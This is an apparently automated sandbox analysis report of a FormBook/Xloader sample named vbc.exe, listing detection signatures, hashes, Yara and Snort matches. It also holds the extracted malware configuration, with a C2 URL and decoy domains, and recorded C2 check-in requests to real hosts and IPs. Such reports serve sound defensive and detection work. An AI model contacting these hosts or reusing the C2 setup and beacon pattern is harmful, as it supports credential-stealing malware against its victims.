Windows Analysis Report vbc.exe

Overview

General Information

Sample Name: vbc.exe
Analysis ID: 518412
MD5: c4a1bdd685e346b7604f93357a922875
SHA1: 6b8fccadcf1977f5850faa1c47617343fafc0ff4
SHA256: 728b23f75c1140a1763dd7c75083f2ae57afeb6ffa3d7b33a9ba1b4904c4566d
Tags: exeXloader
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}
Yara detected FormBook
Source: Yara match File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.joye.club/ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH Avira URL Cloud: Label: phishing
Source: http://www.mattlambert.xyz/ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH Avira URL Cloud: Label: phishing
Antivirus or Machine Learning detection for unpacked file
Source: 8.0.vbc.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.vbc.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.vbc.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: vbc.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: vbc.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe
Source: Binary string: help.pdbGCTL source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp
Source: Binary string: help.pdb source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\vbc.exe Code function: 4x nop then pop ebx 8_2_00406ABE
Source: C:\Windows\SysWOW64\help.exe Code function: 4x nop then pop ebx 20_2_02B46ABE

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 44.227.65.245:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 44.227.65.245:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 44.227.65.245:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49816 -> 172.67.188.247:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49816 -> 172.67.188.247:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49816 -> 172.67.188.247:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49821 -> 101.132.116.91:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49821 -> 101.132.116.91:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49821 -> 101.132.116.91:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.miabellavita.com
Source: C:\Windows\explorer.exe Domain query: www.joye.club
Source: C:\Windows\explorer.exe Domain query: www.maikoufarm.com
Source: C:\Windows\explorer.exe Domain query: www.mmj0115.xyz
Source: C:\Windows\explorer.exe Network Connect: 44.227.65.245 80
Source: C:\Windows\explorer.exe Domain query: www.septemberstockevent200.com
Source: C:\Windows\explorer.exe Domain query: www.watermountsteam.top
Source: C:\Windows\explorer.exe Network Connect: 104.21.4.114 80
Source: C:\Windows\explorer.exe Domain query: www.yungbredda.com
Source: C:\Windows\explorer.exe Domain query: www.leewaysvcs.com
Source: C:\Windows\explorer.exe Domain query: www.sharpstead.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 118.27.122.222 80
Source: C:\Windows\explorer.exe Network Connect: 172.67.188.247 80
Source: C:\Windows\explorer.exe Network Connect: 101.132.116.91 80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.mmj0115.xyz
Source: DNS query: www.mattlambert.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.septemberstockevent200.com/ht08/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: INTERQGMOInternetIncJP
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.sharpstead.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.maikoufarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH HTTP/1.1Host: www.septemberstockevent200.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH HTTP/1.1Host: www.joye.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH HTTP/1.1Host: www.miabellavita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=h33IU5xP+CsHIX0jyOd12cEn3mj+DYpLQqBt2JgN37c56kNOSv5/h9LYm8RBo0LsRlylinxRVA==&IfNL=N8ph5BwH HTTP/1.1Host: www.yungbredda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH HTTP/1.1Host: www.mattlambert.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 44.227.65.245
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 09 Nov 2021 11:57:34 GMTContent-Type: text/htmlContent-Length: 275ETag: "6182ae77-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Nov 2021 11:57:40 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 74 30 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ht08/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 09 Nov 2021 11:58:02 GMTContent-Type: text/htmlContent-Length: 275ETag: "6182ac26-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 09 Nov 2021 11:58:13 GMTContent-Type: text/htmlContent-Length: 275ETag: "6185407c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000B.00000000.291685186.0000000006870000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown DNS traffic detected: queries for: www.sharpstead.com
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.sharpstead.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.maikoufarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH HTTP/1.1Host: www.septemberstockevent200.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH HTTP/1.1Host: www.joye.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH HTTP/1.1Host: www.miabellavita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=h33IU5xP+CsHIX0jyOd12cEn3mj+DYpLQqBt2JgN37c56kNOSv5/h9LYm8RBo0LsRlylinxRVA==&IfNL=N8ph5BwH HTTP/1.1Host: www.yungbredda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH HTTP/1.1Host: www.mattlambert.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: vbc.exe, 00000000.00000002.263973483.0000000000D39000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
